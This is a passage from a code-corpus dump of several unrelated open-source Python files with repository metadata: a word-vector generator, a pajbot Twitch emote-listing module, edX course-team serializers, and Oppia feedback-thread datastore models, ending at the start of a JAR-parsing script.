print >> f, word.encode('UTF-8'), ' '.join('%f' % w for w in vector)
# ----------------------------------------------------------------------
def generate_vectors(num_vectors, num_features, min_value=-0.1, max_value=0.1):
"""
Generates vectors of real numbers, to be used as word features.
Vectors are initialized randomly with values in the interval [min_value, max_value]
:return: a 2-dim numpy array.
"""
# set the seed for replicability
#np.random.seed(42) # DEBUG
table = np.random.uniform(min_value, max_value, (num_vectors, num_features))
logging.debug("Generated %d feature vectors with %d features each." %
(num_vectors, num_features))
return table
| gpl-3.0 | 7,357,621,401,348,060,000 | 30.100671 | 87 | 0.528917 | false |
pajlada/pajbot | pajbot/modules/basic/emotes.py | 2 | 10421 | import logging
from pajbot.managers.emote import BTTVEmoteManager, FFZEmoteManager, TwitchEmoteManager
from pajbot.models.command import Command
from pajbot.models.command import CommandExample
from pajbot.modules import BaseModule
from pajbot.modules import ModuleSetting
from pajbot.modules.basic import BasicCommandsModule
from pajbot.streamhelper import StreamHelper
from pajbot.utils import split_into_chunks_with_prefix
log = logging.getLogger(__name__)
class EmotesModule(BaseModule):
ID = __name__.split(".")[-1]
NAME = "Emotes"
ENABLED_DEFAULT = True
DESCRIPTION = "Refresh and list FFZ, BTTV and Sub emotes"
CATEGORY = "Feature"
PARENT_MODULE = BasicCommandsModule
SETTINGS = [
ModuleSetting(
key="global_cd",
label="Global cooldown of all emote-commands (seconds)",
type="number",
required=True,
placeholder="",
default=5,
constraints={"min_value": 0, "max_value": 120},
),
ModuleSetting(
key="user_cd",
label="Per-user cooldown of all emote-commands (seconds)",
type="number",
required=True,
placeholder="",
default=15,
constraints={"min_value": 0, "max_value": 240},
),
ModuleSetting(
key="level",
label="Level required to use the commands",
type="number",
required=True,
placeholder="",
default=100,
constraints={"min_value": 100, "max_value": 2000},
),
ModuleSetting(
key="enable_subemotes", label="Enable !subemotes command", type="boolean", required=True, default=True
),
ModuleSetting(
key="custom_sub_response",
label="A custom message to override the default !subemotes output format. Leave empty to use default format (1 or multiple messages showing all emotes). | Available arguments: {source}, {streamer}",
type="text",
required=False,
placeholder="@{source}, Channel sub emotes can be found here: https://twitchemotes.com/channels/11148817",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="enable_ffzemotes", label="Enable !ffzemotes command", type="boolean", required=True, default=True
),
ModuleSetting(
key="custom_ffz_response",
label="A custom message to override the default !ffzemotes output format. Leave empty to use default format (1 or multiple messages showing all emotes). | Available arguments: {source}, {streamer}",
type="text",
required=False,
placeholder="@{source}, Channel FFZ emotes can be found here: https://www.frankerfacez.com/channel/pajlada",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="enable_bttvemotes", label="Enable !bttvemotes command", type="boolean", required=True, default=True
),
ModuleSetting(
key="custom_bttv_response",
label="A custom message to override the default !bttvemotes output format. Leave empty to use default format (1 or multiple messages showing all emotes). | Available arguments: {source}, {streamer}",
type="text",
required=False,
placeholder="@{source}, Channel BTTV emotes can be found here: https://betterttv.com/users/550daf6562e6bd0027aedb5e",
default="",
constraints={"max_str_len": 400},
),
]
def print_emotes(self, source, manager):
if self.settings[f"custom_{manager.friendly_name.lower()}_response"] != "":
custom_message = self.settings[f"custom_{manager.friendly_name.lower()}_response"]
self.bot.say(custom_message.format(streamer=StreamHelper.get_streamer_display(), source=source))
else:
emotes = manager.channel_emotes
messages = split_into_chunks_with_prefix(
[{"prefix": f"{manager.friendly_name} emotes:", "parts": [e.code for e in emotes]}],
default=f"No {manager.friendly_name} Emotes active in this chat :(",
)
for message in messages:
self.bot.say(message)
def print_twitch_emotes(self, source, **rest):
if self.settings["custom_sub_response"] != "":
custom_message = self.settings["custom_sub_response"]
self.bot.say(custom_message.format(streamer=StreamHelper.get_streamer_display(), source=source))
else:
manager = self.bot.emote_manager.twitch_emote_manager
messages = split_into_chunks_with_prefix(
[
{"prefix": "Subscriber emotes:", "parts": [e.code for e in manager.tier_one_emotes]},
{"prefix": "T2:", "parts": [e.code for e in manager.tier_two_emotes]},
{"prefix": "T3:", "parts": [e.code for e in manager.tier_three_emotes]},
],
default=f"Looks like {StreamHelper.get_streamer_display()} has no subscriber emotes! :(",
)
for message in messages:
self.bot.say(message)
def reload_cmd(self, manager):
# manager is an instance of the manager in the bot and the class of the manager on the web interface
reload_msg = f"Reloading {manager.friendly_name} emotes..."
def do_reload(bot, source, **rest):
bot.whisper(source, reload_msg)
self.bot.action_queue.submit(manager.update_all)
return Command.raw_command(
do_reload,
level=500,
delay_all=10,
delay_user=20,
examples=[
CommandExample(
None,
f"Reload all active {manager.friendly_name} emotes for this channel.",
chat=f"user: !{manager.friendly_name.lower()}emotes reload\n" + f"bot>user: {reload_msg}",
).parse()
],
)
def print_cmd(self, manager, examples):
def do_print(source, **rest):
self.print_emotes(source, manager)
if self.settings[f"custom_{manager.friendly_name.lower()}_response"] != "":
bot_response = "bot: " + self.settings[f"custom_{manager.friendly_name.lower()}_response"].format(
source="pajlada", streamer=StreamHelper.get_streamer_display()
)
else:
bot_response = f"bot: {manager.friendly_name} emotes: {examples}"
return Command.raw_command(
do_print,
level=self.settings["level"],
delay_all=self.settings["global_cd"],
delay_user=self.settings["user_cd"],
examples=[
CommandExample(
None,
f"Show all active {manager.friendly_name} emotes for this channel.",
chat=f"user: !{manager.friendly_name.lower()}emotes\n" + bot_response,
).parse()
],
)
def print_twitch_cmd(self):
if self.settings["custom_sub_response"] != "":
bot_response = "bot: " + self.settings["custom_sub_response"].format(
source="pajlada", streamer=StreamHelper.get_streamer_display()
)
else:
bot_response = (
"bot: Subscriber emotes: forsenE forsenC forsenK forsenW Tier 2: forsenSnus Tier 3: forsen2499"
)
return Command.raw_command(
self.print_twitch_emotes,
level=self.settings["level"],
delay_all=self.settings["global_cd"],
delay_user=self.settings["user_cd"],
examples=[
CommandExample(
None,
f"Show all active sub emotes for {StreamHelper.get_streamer_display()}.",
chat="user: !subemotes\n" + bot_response,
).parse()
],
)
def load_commands(self, **options):
cmd_reload_bttv_emotes = self.reload_cmd(
self.bot.emote_manager.bttv_emote_manager if self.bot else BTTVEmoteManager
)
cmd_reload_ffz_emotes = self.reload_cmd(
self.bot.emote_manager.ffz_emote_manager if self.bot else FFZEmoteManager
)
cmd_reload_twitch_emotes = self.reload_cmd(
self.bot.emote_manager.twitch_emote_manager if self.bot else TwitchEmoteManager
)
cmd_print_bttv_emotes = self.print_cmd(
self.bot.emote_manager.bttv_emote_manager if self.bot else BTTVEmoteManager, "forsenPls gachiGASM"
)
cmd_print_ffz_emotes = self.print_cmd(
self.bot.emote_manager.ffz_emote_manager if self.bot else FFZEmoteManager, "FeelsOkayMan Kapp LULW"
)
# The ' ' is there to make things look good in the
# web interface.
if self.settings["enable_bttvemotes"]:
self.commands["bttvemotes"] = Command.multiaction_command(
delay_all=self.settings["global_cd"],
delay_user=self.settings["user_cd"],
level=self.settings["level"],
default=" ",
fallback=" ",
command="bttvemotes",
commands={"reload": cmd_reload_bttv_emotes, " ": cmd_print_bttv_emotes},
)
if self.settings["enable_ffzemotes"]:
self.commands["ffzemotes"] = Command.multiaction_command(
delay_all=self.settings["global_cd"],
delay_user=self.settings["user_cd"],
level=self.settings["level"],
default=" ",
fallback=" ",
command="ffzemotes",
commands={"reload": cmd_reload_ffz_emotes, " ": cmd_print_ffz_emotes},
)
if self.settings["enable_subemotes"]:
self.commands["subemotes"] = Command.multiaction_command(
delay_all=self.settings["global_cd"],
delay_user=self.settings["user_cd"],
level=self.settings["level"],
default=" ",
fallback=" ",
command="subemotes",
commands={"reload": cmd_reload_twitch_emotes, " ": self.print_twitch_cmd()},
)
| mit | -703,860,394,121,829,100 | 42.60251 | 211 | 0.570579 | false |
edcast-inc/edx-platform-edcast | lms/djangoapps/teams/serializers.py | 23 | 3821 | """Defines serializers used by the Team API."""
from django.contrib.auth.models import User
from rest_framework import serializers
from openedx.core.lib.api.serializers import CollapsedReferenceSerializer
from openedx.core.lib.api.fields import ExpandableField
from .models import CourseTeam, CourseTeamMembership
from openedx.core.djangoapps.user_api.serializers import UserSerializer
class UserMembershipSerializer(serializers.ModelSerializer):
"""Serializes CourseTeamMemberships with only user and date_joined
Used for listing team members.
"""
user = ExpandableField(
collapsed_serializer=CollapsedReferenceSerializer(
model_class=User,
id_source='username',
view_name='accounts_api',
read_only=True,
),
expanded_serializer=UserSerializer(),
)
class Meta(object):
"""Defines meta information for the ModelSerializer."""
model = CourseTeamMembership
fields = ("user", "date_joined")
read_only_fields = ("date_joined",)
class CourseTeamSerializer(serializers.ModelSerializer):
"""Serializes a CourseTeam with membership information."""
id = serializers.CharField(source='team_id', read_only=True) # pylint: disable=invalid-name
membership = UserMembershipSerializer(many=True, read_only=True)
class Meta(object):
"""Defines meta information for the ModelSerializer."""
model = CourseTeam
fields = (
"id",
"name",
"is_active",
"course_id",
"topic_id",
"date_created",
"description",
"country",
"language",
"membership",
)
read_only_fields = ("course_id", "date_created")
class CourseTeamCreationSerializer(serializers.ModelSerializer):
"""Deserializes a CourseTeam for creation."""
class Meta(object):
"""Defines meta information for the ModelSerializer."""
model = CourseTeam
fields = (
"name",
"course_id",
"description",
"topic_id",
"country",
"language",
)
def restore_object(self, attrs, instance=None):
"""Restores a CourseTeam instance from the given attrs."""
return CourseTeam.create(
name=attrs.get("name", ''),
course_id=attrs.get("course_id"),
description=attrs.get("description", ''),
topic_id=attrs.get("topic_id", ''),
country=attrs.get("country", ''),
language=attrs.get("language", ''),
)
class MembershipSerializer(serializers.ModelSerializer):
"""Serializes CourseTeamMemberships with information about both teams and users."""
user = ExpandableField(
collapsed_serializer=CollapsedReferenceSerializer(
model_class=User,
id_source='username',
view_name='accounts_api',
read_only=True,
),
expanded_serializer=UserSerializer(read_only=True)
)
team = ExpandableField(
collapsed_serializer=CollapsedReferenceSerializer(
model_class=CourseTeam,
id_source='team_id',
view_name='teams_detail',
read_only=True,
),
expanded_serializer=CourseTeamSerializer(read_only=True)
)
class Meta(object):
"""Defines meta information for the ModelSerializer."""
model = CourseTeamMembership
fields = ("user", "team", "date_joined")
read_only_fields = ("date_joined",)
class TopicSerializer(serializers.Serializer):
"""Serializes a topic."""
description = serializers.CharField()
name = serializers.CharField()
id = serializers.CharField() # pylint: disable=invalid-name
| agpl-3.0 | 8,853,858,381,622,441,000 | 32.226087 | 96 | 0.622088 | false |
prasanna08/oppia | core/storage/feedback/gae_models.py | 1 | 28683 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Models for Oppia feedback threads and messages."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.platform import models
import feconf
import python_utils
import utils
from google.appengine.ext import ndb
(base_models, user_models) = models.Registry.import_models([
models.NAMES.base_model, models.NAMES.user])
# Allowed feedback thread statuses.
STATUS_CHOICES_OPEN = 'open'
STATUS_CHOICES_FIXED = 'fixed'
STATUS_CHOICES_IGNORED = 'ignored'
STATUS_CHOICES_COMPLIMENT = 'compliment'
STATUS_CHOICES_NOT_ACTIONABLE = 'not_actionable'
STATUS_CHOICES = [
STATUS_CHOICES_OPEN,
STATUS_CHOICES_FIXED,
STATUS_CHOICES_IGNORED,
STATUS_CHOICES_COMPLIMENT,
STATUS_CHOICES_NOT_ACTIONABLE,
]
# Constants used for generating new ids.
_MAX_RETRIES = 10
_RAND_RANGE = 127 * 127
class GeneralFeedbackThreadModel(base_models.BaseModel):
"""Threads for each entity.
The id of instances of this class has the form
[entity_type].[entity_id].[generated_string]
"""
# The type of entity the thread is linked to.
entity_type = ndb.StringProperty(required=True, indexed=True)
# The ID of the entity the thread is linked to.
entity_id = ndb.StringProperty(required=True, indexed=True)
# ID of the user who started the thread. This may be None if the feedback
# was given anonymously by a learner.
original_author_id = ndb.StringProperty(indexed=True)
# Latest status of the thread.
status = ndb.StringProperty(
default=STATUS_CHOICES_OPEN,
choices=STATUS_CHOICES,
required=True,
indexed=True,
)
# Latest subject of the thread.
subject = ndb.StringProperty(indexed=True, required=True)
# Summary text of the thread.
summary = ndb.TextProperty(indexed=False)
# Specifies whether this thread has a related suggestion.
has_suggestion = (
ndb.BooleanProperty(indexed=True, default=False, required=True))
# Cached value of the number of messages in the thread.
message_count = ndb.IntegerProperty(indexed=True, default=0)
# Cached text of the last message in the thread with non-empty content, or
# None if there is no such message.
last_nonempty_message_text = ndb.TextProperty(indexed=False)
# Cached ID for the user of the last message in the thread with non-empty
# content, or None if the message was made anonymously or if there is no
# such message.
last_nonempty_message_author_id = ndb.StringProperty(indexed=True)
@staticmethod
def get_deletion_policy():
"""General feedback thread needs to be pseudonymized for the user."""
return base_models.DELETION_POLICY.LOCALLY_PSEUDONYMIZE
@classmethod
def get_export_policy(cls):
"""Model contains user data."""
return dict(super(cls, cls).get_export_policy(), **{
'entity_type': base_models.EXPORT_POLICY.EXPORTED,
'entity_id': base_models.EXPORT_POLICY.EXPORTED,
'original_author_id': base_models.EXPORT_POLICY.EXPORTED,
'status': base_models.EXPORT_POLICY.EXPORTED,
'subject': base_models.EXPORT_POLICY.EXPORTED,
'summary': base_models.EXPORT_POLICY.EXPORTED,
'has_suggestion': base_models.EXPORT_POLICY.EXPORTED,
'message_count': base_models.EXPORT_POLICY.EXPORTED,
'last_nonempty_message_text':
base_models.EXPORT_POLICY.EXPORTED,
'last_nonempty_message_author_id':
base_models.EXPORT_POLICY.EXPORTED
})
@classmethod
def has_reference_to_user_id(cls, user_id):
"""Check whether GeneralFeedbackThreadModel exists for user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return cls.query(ndb.OR(
cls.original_author_id == user_id,
cls.last_nonempty_message_author_id == user_id
)).get(keys_only=True) is not None
@classmethod
def export_data(cls, user_id):
"""Exports the data from GeneralFeedbackThreadModel
into dict format for Takeout.
Args:
user_id: str. The ID of the user whose data should be exported.
Returns:
dict. Dictionary of the data from GeneralFeedbackThreadModel.
"""
user_data = dict()
feedback_models = cls.get_all().filter(
cls.original_author_id == user_id).fetch()
for feedback_model in feedback_models:
user_data[feedback_model.id] = {
'entity_type': feedback_model.entity_type,
'entity_id': feedback_model.entity_id,
'status': feedback_model.status,
'subject': feedback_model.subject,
'has_suggestion': feedback_model.has_suggestion,
'summary': feedback_model.summary,
'message_count': feedback_model.message_count,
'last_updated_msec': utils.get_time_in_millisecs(
feedback_model.last_updated)
}
return user_data
@classmethod
def generate_new_thread_id(cls, entity_type, entity_id):
"""Generates a new thread ID which is unique.
Args:
entity_type: str. The type of the entity.
entity_id: str. The ID of the entity.
Returns:
str. A thread ID that is different from the IDs of all
the existing threads within the given entity.
Raises:
Exception. There were too many collisions with existing thread IDs
when attempting to generate a new thread ID.
"""
for _ in python_utils.RANGE(_MAX_RETRIES):
thread_id = (
entity_type + '.' + entity_id + '.' +
utils.base64_from_int(utils.get_current_time_in_millisecs()) +
utils.base64_from_int(utils.get_random_int(_RAND_RANGE)))
if not cls.get_by_id(thread_id):
return thread_id
raise Exception(
'New thread id generator is producing too many collisions.')
@classmethod
def create(cls, thread_id):
"""Creates a new FeedbackThreadModel entry.
Args:
thread_id: str. Thread ID of the newly-created thread.
Returns:
GeneralFeedbackThreadModel. The newly created FeedbackThreadModel
instance.
Raises:
Exception. A thread with the given thread ID exists already.
"""
if cls.get_by_id(thread_id):
raise Exception('Feedback thread ID conflict on create.')
return cls(id=thread_id)
@classmethod
def get_threads(
cls, entity_type, entity_id, limit=feconf.DEFAULT_QUERY_LIMIT):
"""Returns a list of threads associated with the entity, ordered
by their "last updated" field. The number of entities fetched is
limited by the `limit` argument to this method, whose default
value is equal to the default query limit.
Args:
entity_type: str. The type of the entity.
entity_id: str. The ID of the entity.
limit: int. The maximum possible number of items in the returned
list.
Returns:
list(GeneralFeedbackThreadModel). List of threads associated with
the entity. Doesn't include deleted entries.
"""
return cls.get_all().filter(cls.entity_type == entity_type).filter(
cls.entity_id == entity_id).order(-cls.last_updated).fetch(limit)
class GeneralFeedbackMessageModel(base_models.BaseModel):
"""Feedback messages. One or more of these messages make a thread.
The id of instances of this class has the form [thread_id].[message_id]
"""
# ID corresponding to an entry of FeedbackThreadModel.
thread_id = ndb.StringProperty(required=True, indexed=True)
# 0-based sequential numerical ID. Sorting by this field will create the
# thread in chronological order.
message_id = ndb.IntegerProperty(required=True, indexed=True)
# ID of the user who posted this message. This may be None if the feedback
# was given anonymously by a learner.
author_id = ndb.StringProperty(indexed=True)
# New thread status. Must exist in the first message of a thread. For the
# rest of the thread, should exist only when the status changes.
updated_status = ndb.StringProperty(choices=STATUS_CHOICES, indexed=True)
# New thread subject. Must exist in the first message of a thread. For the
# rest of the thread, should exist only when the subject changes.
updated_subject = ndb.StringProperty(indexed=False)
# Message text. Allowed not to exist (e.g. post only to update the status).
text = ndb.TextProperty(indexed=False)
# Whether the incoming message is received by email (as opposed to via
# the web).
received_via_email = (
ndb.BooleanProperty(default=False, indexed=True, required=True))
@staticmethod
def get_deletion_policy():
"""General feedback message needs to be pseudonymized for the user."""
return base_models.DELETION_POLICY.LOCALLY_PSEUDONYMIZE
@classmethod
def get_export_policy(cls):
"""Model contains user data."""
return dict(super(cls, cls).get_export_policy(), **{
'thread_id': base_models.EXPORT_POLICY.EXPORTED,
'message_id': base_models.EXPORT_POLICY.EXPORTED,
'author_id': base_models.EXPORT_POLICY.EXPORTED,
'updated_status': base_models.EXPORT_POLICY.EXPORTED,
'updated_subject': base_models.EXPORT_POLICY.EXPORTED,
'text': base_models.EXPORT_POLICY.EXPORTED,
'received_via_email': base_models.EXPORT_POLICY.EXPORTED
})
@classmethod
def has_reference_to_user_id(cls, user_id):
"""Check whether GeneralFeedbackMessageModel exists for user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return cls.query(cls.author_id == user_id).get(
keys_only=True) is not None
@classmethod
def export_data(cls, user_id):
"""Exports the data from GeneralFeedbackMessageModel
into dict format for Takeout.
Args:
user_id: str. The ID of the user whose data should be exported.
Returns:
dict. Dictionary of the data from GeneralFeedbackMessageModel.
"""
user_data = dict()
feedback_models = cls.get_all().filter(cls.author_id == user_id).fetch()
for feedback_model in feedback_models:
user_data[feedback_model.id] = {
'thread_id': feedback_model.thread_id,
'message_id': feedback_model.message_id,
'updated_status': feedback_model.updated_status,
'updated_subject': feedback_model.updated_subject,
'text': feedback_model.text,
'received_via_email': feedback_model.received_via_email
}
return user_data
@classmethod
def _generate_id(cls, thread_id, message_id):
"""Generates full message ID given the thread ID and message ID.
Args:
thread_id: str. Thread ID of the thread to which the message
belongs.
message_id: int. Message ID of the message.
Returns:
str. Full message ID.
"""
return '.'.join([thread_id, python_utils.UNICODE(message_id)])
@property
def entity_id(self):
"""Returns the entity_id corresponding to this thread instance.
Returns:
str. The entity_id.
"""
return self.id.split('.')[1]
@property
def entity_type(self):
"""Returns the entity_type corresponding to this thread instance.
Returns:
str. The entity_type.
"""
return self.id.split('.')[0]
@classmethod
def create(cls, message_identifier):
"""Creates a new GeneralFeedbackMessageModel entry.
Args:
message_identifier: FullyQualifiedMessageIdentifier. The message
identifier consists of the thread_id and its corresponding
message_id.
Returns:
GeneralFeedbackMessageModel. Instance of the new
GeneralFeedbackMessageModel entry.
Raises:
Exception. A message with the same ID already exists
in the given thread.
"""
return cls.create_multi([message_identifier])[0]
@classmethod
def create_multi(cls, message_identifiers):
"""Creates a new GeneralFeedbackMessageModel entry for each
(thread_id, message_id) pair.
Args:
message_identifiers: list(FullyQualifiedMessageIdentifier). Each
message identifier consists of the thread_id and its
corresponding message_id.
Returns:
list(GeneralFeedbackMessageModel). Instances of the new
GeneralFeedbackMessageModel entries.
Raises:
Exception. The number of thread_ids must be equal to the number of
message_ids.
Exception. A message with the same ID already exists
in the given thread.
"""
thread_ids = [
message_identifier.thread_id for message_identifier
in message_identifiers]
message_ids = [
message_identifier.message_id for message_identifier
in message_identifiers]
# Generate the new ids.
instance_ids = [
cls._generate_id(thread_id, message_id) for thread_id, message_id
in python_utils.ZIP(thread_ids, message_ids)
]
# Check if the new ids are valid.
current_instances = cls.get_multi(instance_ids)
conflict_ids = [
current_instance.id for current_instance in current_instances if
current_instance is not None
]
if len(conflict_ids) > 0:
raise Exception(
'The following feedback message ID(s) conflicted on '
'create: %s' % (' '.join(conflict_ids))
)
return [cls(id=instance_id) for instance_id in instance_ids]
@classmethod
def get(cls, thread_id, message_id, strict=True):
"""Gets the GeneralFeedbackMessageModel entry for the given ID. Raises
an error if no undeleted message with the given ID is found and
strict == True.
Args:
thread_id: str. ID of the thread.
message_id: int. ID of the message.
strict: bool. Whether to raise an error if no FeedbackMessageModel
entry is found for the given IDs.
Returns:
GeneralFeedbackMessageModel or None. If strict == False and no
undeleted message with the given message_id exists in the
datastore, then returns None. Otherwise, returns the
GeneralFeedbackMessageModel instance that corresponds to the
given ID.
Raises:
EntityNotFoundError. The value of strict is True and either
(i) message ID is not valid
(ii) message is marked as deleted.
No error will be raised if strict == False.
"""
instance_id = cls._generate_id(thread_id, message_id)
return super(GeneralFeedbackMessageModel, cls).get(
instance_id, strict=strict)
@classmethod
def get_messages(cls, thread_id):
"""Returns a list of messages in the given thread. The number of
messages returned is capped by feconf.DEFAULT_QUERY_LIMIT.
Args:
thread_id: str. ID of the thread.
Returns:
list(GeneralFeedbackMessageModel). A list of messages in the
given thread, up to a maximum of feconf.DEFAULT_QUERY_LIMIT
messages.
"""
return cls.get_all().filter(
cls.thread_id == thread_id).fetch(feconf.DEFAULT_QUERY_LIMIT)
@classmethod
def get_most_recent_message(cls, thread_id):
"""Returns the last message in the thread.
Args:
thread_id: str. ID of the thread.
Returns:
GeneralFeedbackMessageModel. Last message in the thread.
"""
thread = GeneralFeedbackThreadModel.get_by_id(thread_id)
return cls.get(thread_id, thread.message_count - 1)
@classmethod
def get_message_count(cls, thread_id):
"""Returns the number of messages in the thread. Includes the
deleted entries.
Args:
thread_id: str. ID of the thread.
Returns:
int. Number of messages in the thread.
"""
return cls.get_message_counts([thread_id])[0]
@classmethod
def get_message_counts(cls, thread_ids):
"""Returns a list containing the number of messages in the threads.
Includes the deleted entries.
Args:
thread_ids: list(str). ID of the threads.
Returns:
list(int). List of the message counts for the threads.
"""
thread_models = GeneralFeedbackThreadModel.get_multi(thread_ids)
return [thread_model.message_count for thread_model in thread_models]
@classmethod
def get_all_messages(cls, page_size, urlsafe_start_cursor):
"""Fetches a list of all the messages sorted by their last updated
attribute.
Args:
page_size: int. The maximum number of messages to be returned.
urlsafe_start_cursor: str or None. If provided, the list of
returned messages starts from this datastore cursor.
Otherwise, the returned messages start from the beginning
of the full list of messages.
Returns:
3-tuple of (results, cursor, more). Where:
results: List of query results.
cursor: str or None. A query cursor pointing to the next
batch of results. If there are no more results, this might
be None.
more: bool. If True, there are (probably) more results after
this batch. If False, there are no further results after
this batch.
"""
return cls._fetch_page_sorted_by_last_updated(
cls.query(), page_size, urlsafe_start_cursor)
class GeneralFeedbackThreadUserModel(base_models.BaseModel):
"""Model for storing the ids of the messages in the thread that are read by
the user.
Instances of this class have keys of the form [user_id].[thread_id]
"""
user_id = ndb.StringProperty(required=True, indexed=True)
thread_id = ndb.StringProperty(required=True, indexed=True)
message_ids_read_by_user = ndb.IntegerProperty(repeated=True, indexed=True)
@staticmethod
def get_deletion_policy():
"""General feedback thread user can be deleted since it only contains
information relevant to the one user.
"""
return base_models.DELETION_POLICY.DELETE
@classmethod
def get_export_policy(cls):
"""Model contains user data."""
return dict(super(cls, cls).get_export_policy(), **{
'user_id': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'thread_id': base_models.EXPORT_POLICY.EXPORTED,
'message_ids_read_by_user':
base_models.EXPORT_POLICY.EXPORTED
})
@classmethod
def apply_deletion_policy(cls, user_id):
"""Delete instance of GeneralFeedbackThreadUserModel for the user.
Args:
user_id: str. The ID of the user whose data should be deleted.
"""
ndb.delete_multi(
cls.query(cls.user_id == user_id).fetch(keys_only=True))
@classmethod
def has_reference_to_user_id(cls, user_id):
"""Check whether GeneralFeedbackThreadUserModel exists for user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return cls.query(cls.user_id == user_id).get(keys_only=True) is not None
@classmethod
def generate_full_id(cls, user_id, thread_id):
"""Generates the full message id of the format:
<user_id.thread_id>.
Args:
user_id: str. The user id.
thread_id: str. The thread id.
Returns:
str. The full message id.
"""
return '%s.%s' % (user_id, thread_id)
@classmethod
def get(cls, user_id, thread_id):
"""Gets the FeedbackThreadUserModel corresponding to the given user and
the thread.
Args:
user_id: str. The id of the user.
thread_id: str. The id of the thread.
Returns:
FeedbackThreadUserModel. The FeedbackThreadUserModel instance which
matches with the given user_id, and thread id.
"""
instance_id = cls.generate_full_id(user_id, thread_id)
return super(GeneralFeedbackThreadUserModel, cls).get(
instance_id, strict=False)
@classmethod
def create(cls, user_id, thread_id):
"""Creates a new FeedbackThreadUserModel instance and returns it.
Args:
user_id: str. The id of the user.
thread_id: str. The id of the thread.
Returns:
FeedbackThreadUserModel. The newly created FeedbackThreadUserModel
instance.
"""
return cls.create_multi(user_id, [thread_id])[0]
@classmethod
def create_multi(cls, user_id, thread_ids):
"""Creates new FeedbackThreadUserModel instances for user_id for each
of the thread_ids.
Args:
user_id: str. The id of the user.
thread_ids: list(str). The ids of the threads.
Returns:
list(FeedbackThreadUserModel). The newly created
FeedbackThreadUserModel instances.
"""
new_instances = []
for thread_id in thread_ids:
instance_id = cls.generate_full_id(user_id, thread_id)
new_instance = cls(
id=instance_id, user_id=user_id, thread_id=thread_id)
new_instances.append(new_instance)
GeneralFeedbackThreadUserModel.put_multi(new_instances)
return new_instances
@classmethod
def get_multi(cls, user_id, thread_ids):
"""Gets the ExplorationUserDataModel corresponding to the given user and
the thread ids.
Args:
user_id: str. The id of the user.
thread_ids: list(str). The ids of the threads.
Returns:
list(FeedbackThreadUserModel). The FeedbackThreadUserModels
corresponding to the given user ans thread ids.
"""
instance_ids = [
cls.generate_full_id(user_id, thread_id)
for thread_id in thread_ids]
return super(GeneralFeedbackThreadUserModel, cls).get_multi(
instance_ids)
@classmethod
def export_data(cls, user_id):
"""Takeout: Export GeneralFeedbackThreadUserModel user-based properties.
Args:
user_id: str. The user_id denotes which user's data to extract.
Returns:
dict. A dict containing the user-relevant properties of
GeneralFeedbackThreadUserModel, i.e., which messages have been
read by the user (as a list of ids) in each thread.
"""
found_models = cls.get_all().filter(cls.user_id == user_id)
user_data = {}
for user_model in found_models:
user_data[user_model.thread_id] = (
user_model.message_ids_read_by_user)
return user_data
class FeedbackAnalyticsModel(base_models.BaseMapReduceBatchResultsModel):
"""Model for storing feedback thread analytics for an exploration.
The key of each instance is the exploration ID.
"""
# The number of open feedback threads for this exploration.
num_open_threads = ndb.IntegerProperty(default=None, indexed=True)
# Total number of feedback threads for this exploration.
num_total_threads = ndb.IntegerProperty(default=None, indexed=True)
@staticmethod
def get_deletion_policy():
"""Feedback analytic model should be kept if the associated exploration
is public.
"""
return base_models.DELETION_POLICY.KEEP_IF_PUBLIC
@classmethod
def get_export_policy(cls):
"""Model does not contain user data."""
return dict(super(cls, cls).get_export_policy(), **{
'num_open_threads': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'num_total_threads': base_models.EXPORT_POLICY.NOT_APPLICABLE
})
@classmethod
def has_reference_to_user_id(cls, unused_user_id):
"""FeedbackAnalyticsModel doesn't reference any user_id directly.
Args:
unused_user_id: str. The (unused) ID of the user whose data
should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return False
@classmethod
def create(cls, model_id, num_open_threads, num_total_threads):
"""Creates a new FeedbackAnalyticsModel entry.
Args:
model_id: str. ID of the model instance to be created. This
is the same as the exploration ID.
num_open_threads: int. Number of open feedback threads for
this exploration.
num_total_threads: int. Total number of feedback threads for
this exploration.
"""
cls(
id=model_id,
num_open_threads=num_open_threads,
num_total_threads=num_total_threads
).put()
class UnsentFeedbackEmailModel(base_models.BaseModel):
"""Model for storing feedback messages that need to be sent to creators.
Instances of this model contain information about feedback messages that
have been received by the site, but have not yet been sent to creators.
The model instances will be deleted once the corresponding email has been
sent.
The id of each model instance is the user_id of the user who should receive
the messages.
"""
# The list of feedback messages that need to be sent to this user.
# Each element in this list is a dict with keys 'entity_type', 'entity_id',
# 'thread_id' and 'message_id'; this information is used to retrieve
# corresponding FeedbackMessageModel instance.
feedback_message_references = ndb.JsonProperty(repeated=True)
# The number of failed attempts that have been made (so far) to
# send an email to this user.
retries = ndb.IntegerProperty(default=0, required=True, indexed=True)
@staticmethod
def get_deletion_policy():
"""Unsent feedback email is kept until sent."""
return base_models.DELETION_POLICY.KEEP
@classmethod
def get_export_policy(cls):
"""Model does not contain user data."""
return dict(super(cls, cls).get_export_policy(), **{
'feedback_message_references':
base_models.EXPORT_POLICY.NOT_APPLICABLE,
'retries': base_models.EXPORT_POLICY.NOT_APPLICABLE
})
@classmethod
def has_reference_to_user_id(cls, user_id):
"""Check whether UnsentFeedbackEmailModel exists for user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether the model for user_id exists.
"""
return cls.get_by_id(user_id) is not None
| apache-2.0 | 907,305,869,170,521,900 | 35.632184 | 80 | 0.627654 | false |
BukGet/devfiles | jarparse.py | 1 | 1481 | #!/usr/bin/env python
from zipfile import ZipFile
from cStringIO import StringIO
